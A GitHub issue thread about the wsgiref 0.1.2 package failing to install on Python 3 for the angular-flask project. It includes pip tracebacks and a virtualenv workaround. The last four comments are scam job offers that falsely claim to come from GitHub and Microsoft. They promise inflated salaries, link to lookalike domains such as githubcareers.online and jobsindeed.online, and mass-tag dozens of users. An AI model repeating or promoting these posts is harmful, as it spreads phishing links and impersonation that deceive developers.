### ISSUE TITLE
dependency issue with package 'wsgiref' on python3

### ISSUE THREAD

**Issue by danfromisrael** [shea256/angular-flask#10]
if trying to run the project on python3 there's a dependency issue with package 'wsgiref' when trying to install packages via requirements.txt

error:
Collecting wsgiref==0.1.2 (from -r requirements.txt (line 16))
  Using cached wsgiref-0.1.2.zip
    Traceback (most recent call last):
      File "<string>", line 20, in <module>
      File "/tmp/pip-build-7cwefmyb/wsgiref/setup.py", line 5, in <module>
        import ez_setup
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
    
      File "<string>", line 20, in <module>
    
      File "/tmp/pip-build-7cwefmyb/wsgiref/setup.py", line 5, in <module>
    
        import ez_setup
    
    ----------------------------------------
    Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-7cwefmyb/wsgiref

**Comment by LeoJavaAI** [comment]
I get the same error, any updates?

**Comment by LukasSliacky** [comment]
same error :/

```
   Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "<string>", line 20, in <module>
      File "/tmp/pip-build-9bksd6f6/wsgiref/setup.py", line 5, in <module>
        import ez_setup
      File "/tmp/pip-build-9bksd6f6/wsgiref/ez_setup/__init__.py", line 170
        print "Setuptools version",version,"or greater has been installed."
                                 ^
    SyntaxError: invalid syntax
```

**Comment by FrancisJen** [comment]
Collecting requests==1.2.3 (from -r requirements.txt (line 13))
  Using cached requests-1.2.3.tar.gz
Collecting six==1.3.0 (from -r requirements.txt (line 14))
  Using cached six-1.3.0.tar.gz
Collecting wsgiref==0.1.2 (from -r requirements.txt (line 15))
  Using cached wsgiref-0.1.2.zip
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/private/var/folders/0f/c415tlls4ns154q2kklt058r0000gp/T/pip-build-e6mge1wm/wsgiref/setup.py", line 5, in <module>
        import ez_setup
      File "/private/var/folders/0f/c415tlls4ns154q2kklt058r0000gp/T/pip-build-e6mge1wm/wsgiref/ez_setup/**init**.py", line 170
        print "Setuptools version",version,"or greater has been installed."
                                 ^
    SyntaxError: Missing parentheses in call to 'print'

```
----------------------------------------
```

Command "python setup.py egg_info" failed with error code 1 in /private/var/folders/0f/c415tlls4ns154q2kklt058r0000gp/T/pip-build-e6mge1wm/wsgiref/

**Comment by FrancisJen** [comment]
I found the solution, that you need create the virtual env at first, and then the problem will be resolved.

the command for your reference
virtualenv env
source env/bin/activate
now , you are in virtualenv, and your can execute the following scripts as mentioned by author

**Comment by tarunjainsagar** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
AoJ, @ik5, @unhappychoice, @PatrickJS, @yareyaredesuyo, @shawnmoyer, @Saifanl, @nicolauatala, @dimsob, @every1no1, @drdpedroso, @cernak, @abmpio, @mrmohammadi99, @ovrdos, @jvphp98, @linqingfeng, @grace401, @jcassani, @toanalien

**Comment by StephaneMobiArchitects** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.Pubkeyth, @aquaflamingo, @jphebus, @Frisk1025, @cyan92128505, @oddphase, @coder5876, @jbrewer106, @imloama, @Gladie-inorbit, @FutureInfinity, @ecoinomist, @10f10h, @paulopaquielli, @wotori, @hanpfei, @Ecno92, @riwu, @Net-burst, @meafs

**Comment by renato71amorim** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 6, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
Prokip03, @gsmadi, @georgecoello, @naonaoyh, @b3da-cz, @koll1232, @Thekuan666, @emacsvi, @neichen, @AlanTanner, @ranqizhu, @caffeinum, @lcdss, @mcd1992, @drouyang, @zinaidac, @thonee05, @cryptohazard, @heipacker, @pecenyknedlik13

**Comment by renato71amorim** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 6, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
realcodywburns, @harunorimurata, @digitaIfabric, @egoperson, @natdebru, @ruyichang, @Pana, @4th-turning, @shozh, @Akpera, @michaelblazej, @c0pLus13, @aarensheng, @myang, @deyvisonrocha, @sherry890501, @Chona94, @Fukunaga42, @rchernobelskiy, @jgannonjr
